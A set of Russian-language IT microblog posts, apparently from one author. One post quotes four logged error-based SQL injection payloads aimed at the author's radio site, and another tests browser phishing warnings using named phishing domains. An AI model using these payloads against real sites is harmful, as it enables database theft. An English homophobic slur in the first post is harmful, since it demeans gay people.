← All posts tagged IT

nibb13

Firefox под виндой мне вдруг говорит:

Случайно закрыли вкладку? Не переживайте. Есть быстрый способ вернуть её обратно: Command + Shift + T. Выдохните с облегчением.
Недавно тут уже упоминали про Ctrl+Z, но суть не в этом. "Под виндой" и "Command +...": get a Mac, you stupid faggot!

nibb13

Тут к нам на сайт радио намедни заходил кто-то. Хотел чего-то. Декодированные QUERY_STRING:

?lang=RU and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(Hex(cast(database() as char))),0x27,0x7e)) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1

?lang=RU and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,database(),0x27,0x7e)) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1

?page=news and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(Hex(cast(database() as char))),0x27,0x7e)) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1

?page=news and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,database(),0x27,0x7e)) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1

Аж, даже, жалко товарища стало. Ведь на странице "о радио" прямым текстом сказано: "В качестве "базы данных" используется просто файловая система." А он мучался, параметры подбирал... :)

Остаётся надеяться, что это был просто тупой бот, нашедший нас в каком-нибудь гугеле. Не могли же "хакiры" настолько измельчать?

nibb13

Случайно узнал про PSDoom. Вкратце: интерфейс для мониторинга/убийства процессов в системе, выполненный в виде Doom. Процессы могут мочить самого админа и друг друга заодно.

Вот тут линки и описание (англ.): cs.unm.edu

Доставляет безмерно!

nibb13

Итак, попытаемся разобраться, чем же нам грозит инлайн картинки с заведомо небезопасного домена с точки зрения систем безопасности различных браузеров.

Тестируем на:

* Opera 10.63 build 3516
* Firefox 3.6.13
* Chrome 8.0.552.224
* Safari for Windows 5.0 (7533.16)

Internet Explorer не рассматривался, т.к. он отказывается запускаться на моей системе, а также ввиду того, что это вообще не браузер. :)

Методика тестирования:

Браузеру скармливаются три ссылки:
1. На фишинговый сайт.
2. На картинку с этого сайта (лежащую на том же домене, естественно)
3. На сторонний сайт, в который вставлена картинка с фишингового домена простым IMG.

Результаты:

Opera оказалась самой параноидальной. Естественно, на сам сайт она отозвалась нелестно: oblgaz.donetsk.ua
Картинка тоже попала в разряд мошеннических (параноик во мне одобряет): oblgaz.donetsk.ua
Но вот страница, на которой вставлена картинка, уже, вполне естественно, не вызвала у Opera подозрений: oblgaz.donetsk.ua
Итог: всё в порядке.

Firefox сам сайт идентифицировал как мошеннический: oblgaz.donetsk.ua
На отдельную картинку и, уж тем более, на сторонний сайт реакции нет: oblgaz.donetsk.ua
oblgaz.donetsk.ua
Итог: всё замечательно.

Chrome повёл себя в точности как Firefox:
oblgaz.donetsk.ua
oblgaz.donetsk.ua
oblgaz.donetsk.ua
Итог: предсказуемый.

Safari вообще на fraud-сайты реагировать отказывается. Ну и флаг ему в главное меню!

Общий итог — проблем с идентификацией сайта, как мошеннического, при вставке картинок с мошеннического домена нет ни в одном из мейнстримовых браузеров.

Поэтому случайно ли, специально ли, отобразив на своём сайте картинку с небезопасного домена мы не рискуем испугать пользователя внезапным сообщением об опасности нашего сайта.

А также, принимая в учёт принципы формирования списков опасных сайтов, мы можем сделать логичный вывод: сайт, на котором размещена картинка, подгружающаяся с опасного сайта, не попадёт в эти списки.

Я не против незнания или непонимания чего бы-то ни было. Я против глупой уверенности в своей правоте и обвинений оппонента в бестолковости, когда сам абсолютно не разбираешься в вопросе спора. @ugnich, ты во второй раз за день объективно не прав. И будешь объективно не прав в третий раз, сделав вид, что не заметил этого сообщения.

А теперь референсы.

Ссылки на фишинг и не-фишинг, которыми я тестировал браузеры:
tu-deporte.com
tu-deporte.com
oblgaz.donetsk.ua

Конфликт, окончившийся оскорблением меня родимого со стороны Антона: #1106957/22

nibb13

Иногда мне кажется, что Microsoft проектирует интерфейсы целенаправленно издеваясь над пользователем. Впрочем, разработчики остальных ОС вообще не знают, что такое интерфейс. Грусть-тоска меня съедает.